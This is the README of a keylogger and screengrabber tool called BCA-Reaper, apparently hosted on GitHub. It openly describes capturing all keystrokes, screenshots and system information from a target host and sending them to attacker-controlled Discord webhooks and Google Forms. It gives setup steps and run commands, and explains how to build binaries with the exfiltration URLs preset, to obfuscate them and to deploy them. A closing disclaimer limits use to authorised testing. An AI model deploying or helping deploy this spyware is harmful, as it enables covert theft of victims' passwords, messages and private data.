BCA-Reaper
BCA-Reaper copied to clipboard
EONRaider
Log keystrokes, take screenshots and grab system information from a target host and exfiltrate to Discord and Google Forms.
Reaper - A multi-platform keylogger and screengrabber
Reaper is a multi-platform keylogger, screengrabber and information gatherer written in Python 3.
The keylogger module captures all keyboard events independently of which application is being run. Keystrokes on browsers, games, messengers, etc., are all monitored. Similarly, the screenshot module captures images from the active monitor in spite of which application generates them. System information such as OS name, kernel version, architecture and environment variables are also captured.
All data is exfiltrated to a Discord server and/or Google Forms instance through HTTPS. An unlimited number of targets can be monitored simultaneously through both methods.
Linux and Windows binaries are available for download for portability and ease of execution.
Demo
Setup
All you need to run Reaper is a free Discord server and/or a Google Forms instance. You need at least one of the methods for successful exfiltration.
1. Set up Discord
Head over to https://www.discord.com and create a new Discord account and server, if necessary. Create a Webhook URL for any suitable channel and copy the URL.
2. Set up Google Forms
Create a form on https://docs.google.com/forms with a free Google account. Set up as many questions as you need, with any names. Copy the form URL and that's it. The exfiltration works as long as the answer field for the first question is of type Paragraph.
Execute
You can execute Reaper in three ways:
- Directly from one of the pre-compiled binaries made available at dist
- Building your own binaries
- From a local Python interpreter (usually for development purposes)
1. Use a pre-compiled binary
Download Reaper from the dist directory and run it with the URLs of your Discord server and/or Google Forms instance.
C:\Users\name> ./windows_reaper.exe --webhook YOUR-WEBHOOK-URL --forms YOUR-FORM-URL
The same procedure works for the Linux binary. Run with --help for options or check
the Usage section below.
2. (Optional) Build your own binary
What if you need a binary ready to exfiltrate to your own preset Discord and Google Forms URLs on execution without setting them from the command line? This might prove useful in a scenario of threat emulation, for example.
Building the binary allows you to do just that. You just need to install all dependencies and build. Dependency management works with both Poetry (recommended) and Virtualenv.
user@host:~$ git clone https://github.com/EONRaider/BCA-Reaper.git
user@host:~$ cd BCA-Reaper
user@host:~/BCA-Reaper$ poetry install <--or--> pip install -r requirements.txt
With all dependencies in place the build.py file takes care of the rest.
user@host:~/BCA-Reaper$ python3 build.py --webhook YOUR-WEBHOOK-URL --forms YOUR-FORM-URL
The result is a binary file named linux_reaper or windows_reaper.exe that is ready to exfiltrate to your preset URLs
on execution. Optionally obfuscate and deploy in accordance with your threat emulation activity's ROE. Refer
to the Legal Disclaimer
below.
3. (Optional) Run from a Python interpreter
This should be only used for development purposes. For that reason you may need to
manipulate the PYTHONPATH environment variable to point to the root directory of
Reaper.
user@host:~$ git clone https://github.com/EONRaider/BCA-Reaper.git
user@host:~$ cd BCA-Reaper
user@host:~/BCA-Reaper$ poetry install <--or--> pip install -r requirements.txt
user@host:~/BCA-Reaper$ export PYTHONPATH=$(pwd)
user@host:~/BCA-Reaper$ python3 src/reaper.py --help
Usage
usage: reaper.py [-h] [-w <webhook_url>] [-f <google_forms_url>] [-e <seconds>]
BCA Reaper - Log keystrokes, take screenshots and grab system information from a target host
and exfiltrate to Discord and Google Forms
optional arguments:
-h, --help show this help message and exit
-w <webhook_url>, --webhook <webhook_url>
URL of a Webhook for the Discord server.
-f <google_forms_url>, --forms <google_forms_url>
URL of a remote instance of Google Forms.
-e <seconds>, --exfil-time <seconds>
Time in seconds to wait between periodic executions of the exfiltration
of logged data. Defaults to 30 seconds. Set to None to perform a
single operation.
Legal Disclaimer
The use of code contained in this repository, either in part or in its totality, for engaging targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for misuses or damages caused by any code contained in this repository in any event that, accidentally or otherwise, it comes to be utilized by a threat agent or unauthorized entity as a means to compromise the security, privacy, confidentiality, integrity, and/or availability of systems and their associated resources. In this context the term "compromise" is henceforth understood as the leverage of exploitation of known or unknown vulnerabilities present in said systems, including, but not limited to, the implementation of security controls, human- or electronically-enabled.
The use of this code is only endorsed by the developers in those circumstances directly related to educational environments or authorized penetration testing engagements whose declared purpose is that of finding and mitigating vulnerabilities in systems, limiting their exposure to compromises and exploits employed by malicious agents as defined in their respective threat models.
EONRaider